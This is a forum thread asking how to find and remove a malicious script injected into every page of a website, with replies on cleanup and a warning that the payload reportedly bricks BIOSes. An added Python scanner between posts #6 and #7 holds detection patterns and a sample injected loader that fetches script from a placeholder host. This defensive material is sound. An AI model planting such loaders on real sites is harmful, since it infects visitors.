Thread: Malware detected on website, need to remove

  1. #1
    Member
    Join Date
    Jan 2008
    Posts
    30

    Malware detected on website, need to remove

    My friend's website seems to have malware on it; however, I am unsure exactly how to remove it. They are using a JavaScript which reads from another infected site, and this in turn loads the malware. The function seems to be obfuscated in some way. Also, this JavaScript is present on any page which I view on the website. Sorry for vague details, but the function starts like this

    Code:
    <!-- Google analitics BEGIN -->
    
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

    After which there is a large section which doesn't make any sense. The main thing is actually finding exactly where they've inserted the function, as it's not just inserted simply on index.php. If someone very trusted is willing to help me out, I can discuss more in private.

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    My friend's website seems to have malware on it, however, I am unsure exactly how to remove it.
    Why bother?..........................until you have found and fixed the site's vulnerability you are just wasting your time IMO. It would be a bit like banging your head against a wall and taking aspirin because you have a headache?

    You should be able to recover from an uninfected backup? but it will still come back because you are obviously vulnerable?

    For anyone to really help you they will need to visit the site and have a look. I would ask anyone interested to PM shad0w7 to get the relevant information..............thanks

  3. #3
    Member
    Join Date
    Jan 2008
    Posts
    30
    That's not really a problem, because we know how we got hacked, the admin was keylogged... Passwords have been changed, etc., but we still have this problem. Please, if anyone is willing to have a look through the code and figure out where it's hidden, then PM me.

  4. #4
    HYBR|D
    Guest
    Send me a PM, I'd be happy to spend a lil time checking it out, the Moderators here can verify I'm trustworthy.

  5. #5
    HYBR|D
    Guest
    Edit: actually, tell your friend to change the admin password on his hosting cPanel on a different machine, also tell him to check all FTP accounts and change their passwords and lock down permission settings on them.

    Now he will need to browse his file manager in his cPanel account, and manually right click and edit each file located in the file manager under the public_html submenu. He will find that every file will have an iframe with the JavaScript that calls the malware for a drive-by install when users visit the website.

    Also manually check the chmod permissions on each file and correct as necessary.

    Personally I would just delete everything in the file manager and upload a backup that isn't tainted.

    In the future don't download programs etc. from BitTorrent and randomly open suspicious programs etc., and keep your firewall and antivirus definitions up to date and do regular scans.

    I could link you to the actual malware but meh, I'd prob get banned for infecting n00bs. do'h

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    30
    The problem is the main owner is away, and we can't get in contact with him, so we only have FTP access for now. Also, it is not manually inserted in every page, we have checked. It is somehow inserted in some important function which is called by every page in its source. I will PM you a few details.
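A defender-side scan for the situation in posts #1, #5 and #6, added here as an example (not code from the thread): it flags files containing the fake "Google analitics" comment and the document.write(unescape(...)) loader quoted in post #1, and counts PHP include/require targets so the one shared include that every page pulls in stands out. It assumes a PHP site under a web root such as public_html; `load_webroot`, `scan_files`, `include_counts` and the sample site are constructed for this example.

```python
import os
import re

# Markers from the snippet quoted in post #1: the misspelled fake Google Analytics comment and the document.write(unescape(...)) loader.
MARKERS = {
    "fake-ga-comment": re.compile(r"Google\s+analitics", re.I),
    "write-unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
}
# PHP include/require statements, followed to locate the shared include file.
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
SCAN_EXTS = {".php", ".html", ".htm", ".js", ".inc", ".tpl"}

def load_webroot(root):
    """Read every web file under root into {relative posix path: text}."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in SCAN_EXTS:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(path, root).replace(os.sep, "/")] = fh.read()
    return files

def scan_files(files):
    """Map path -> marker names found; an empty dict means no hits."""
    hits = {}
    for path, text in files.items():
        found = [name for name, rx in MARKERS.items() if rx.search(text)]
        if found:
            hits[path] = found
    return hits

def include_counts(files):
    """Map included file -> number of PHP files pulling it in; a file every
    page includes is where a single injection infects the whole site."""
    counts = {}
    for path, text in files.items():
        if path.lower().endswith(".php"):
            for inc in INCLUDE_RE.findall(text):
                counts[inc] = counts.get(inc, 0) + 1
    return counts

# Constructed sample site: two clean pages share inc/header.php, which carries the loader pattern pointing at a placeholder (non-routable) host.
SAMPLE_SITE = {
    "index.php": "<?php require_once('inc/header.php'); ?>\n<h1>Home</h1>\n",
    "about.php": "<?php include 'inc/header.php'; ?>\n<h1>About</h1>\n",
    "inc/header.php": "<!-- Google analitics BEGIN -->\n<script>\n"
                      "document.write(unescape(\"%3Cscript src='http://example.invalid/x.js'%3E\"));\n"
                      "</script>\n",
}
```

Run `scan_files(load_webroot("/path/to/public_html"))` on the real site; any file listed by both functions with a high include count is the shared include to clean first, after restoring from a clean backup as post #5 suggests.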

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    BE CAREFUL FOLKS.................THIS MALWARE IS MALICIOUS!

    It appears to flash your BIOS and leave you with a brick! but it doesn't recognise dual BIOS MoBos...............and I did use a pretty cool ARV to go look...........none of the antimalware saw anything!


    shad0w7, I don't know what country you are in mate, but if it is the USA then take the site down and report the problem to the local (State) CIB, the FBI and the Secret Service. Whoever did that is looking at 5 years minimum; it is a felony offense.

  8. #8
    Only african to own a PC! Cider's Avatar
    Join Date
    Jun 2003
    Location
    Israel
    Posts
    1,683
    Very Interesting
    The world is a dangerous place to live; not because of the people who are evil, but because of the people who don't do anything about it.
    Albert Einstein